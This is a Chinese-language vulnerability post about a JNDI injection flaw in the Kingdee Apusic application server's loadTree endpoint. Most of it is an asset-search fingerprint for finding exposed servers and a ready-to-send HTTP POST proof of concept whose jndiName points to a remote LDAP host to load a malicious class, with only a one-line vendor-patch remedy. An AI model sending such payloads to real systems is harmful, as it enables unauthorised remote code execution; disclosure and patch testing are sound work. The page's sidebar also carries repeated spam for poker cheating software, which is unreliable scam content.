金蝶Apusic应用服务器 loadTree JNDI注入漏洞
创始人
2025-01-16 13:36:29
0

产品介绍

金蝶Apusic是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。

漏洞概述

由于金蝶Apusic应用服务器权限验证不当,使用较低JDK版本,导致攻击者可以向loadTree接口执行JNDI注入,远程加载恶意类,造成远程代码执行。

资产测绘

app.name=“Apusic 金蝶天燕 Server”

漏洞复现

在这里插入图片描述
测试POC:

POST /appmonitor/protect/jndi/loadTree HTTP/1.1 Host: your_ip Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 55  jndiName=ldap://***.***.***.***/Basic/Command/calc 

弹出计算器进行验证
在这里插入图片描述

修复建议

官方已发布漏洞补丁,请联系软件厂商进行修复。

相关内容

热门资讯

黑科技科技(aaPoker)外... 黑科技科技(aaPoker)外挂透明挂辅助挂(软件透明挂)的确真的有挂(2025已更新)(哔哩哔哩)...
黑科技机制(鱼扑克app)外挂... 黑科技机制(鱼扑克app)外挂透明挂辅助透视(黑科技)一贯真的有挂(2022已更新)(哔哩哔哩);1...
黑科技自建房(德扑线上)外挂透... 黑科技自建房(德扑线上)外挂透明挂辅助透视(透视)就是真的有挂(2020已更新)(哔哩哔哩)1、透视...
透视针对(Wpk)外挂透明挂辅... 透视针对(Wpk)外挂透明挂辅助安装(透视)果然真的有挂(2023已更新)(哔哩哔哩)1、机器人多个...
黑科技计算器(哈糖大菠萝)外挂... 黑科技计算器(哈糖大菠萝)外挂透明挂辅助安装(透视)好像真的有挂(2021已更新)(哔哩哔哩)1、黑...
黑科技存在(智星德州扑克)外挂... 黑科技存在(智星德州扑克)外挂透明挂辅助脚本(软件透明挂)就是真的有挂(2022已更新)(哔哩哔哩)...
透视工具(WPK)外挂透明挂辅... 透视工具(WPK)外挂透明挂辅助挂(辅助挂)一般真的有挂(2022已更新)(哔哩哔哩)1、实时开挂更...
黑科技开挂(约局吧)外挂透明挂... 黑科技开挂(约局吧)外挂透明挂辅助神器(透明挂)果真真的有挂(2021已更新)(哔哩哔哩)1、让任何...
黑科技机制(手机德州)外挂透明... 黑科技机制(手机德州)外挂透明挂辅助app(透视辅助)的确真的有挂(2023已更新)(哔哩哔哩);暗...
黑科技ai代打(wepoker... 黑科技ai代打(wepoker)外挂透明挂辅助透视(黑科技)果真真的有挂(2025已更新)(哔哩哔哩...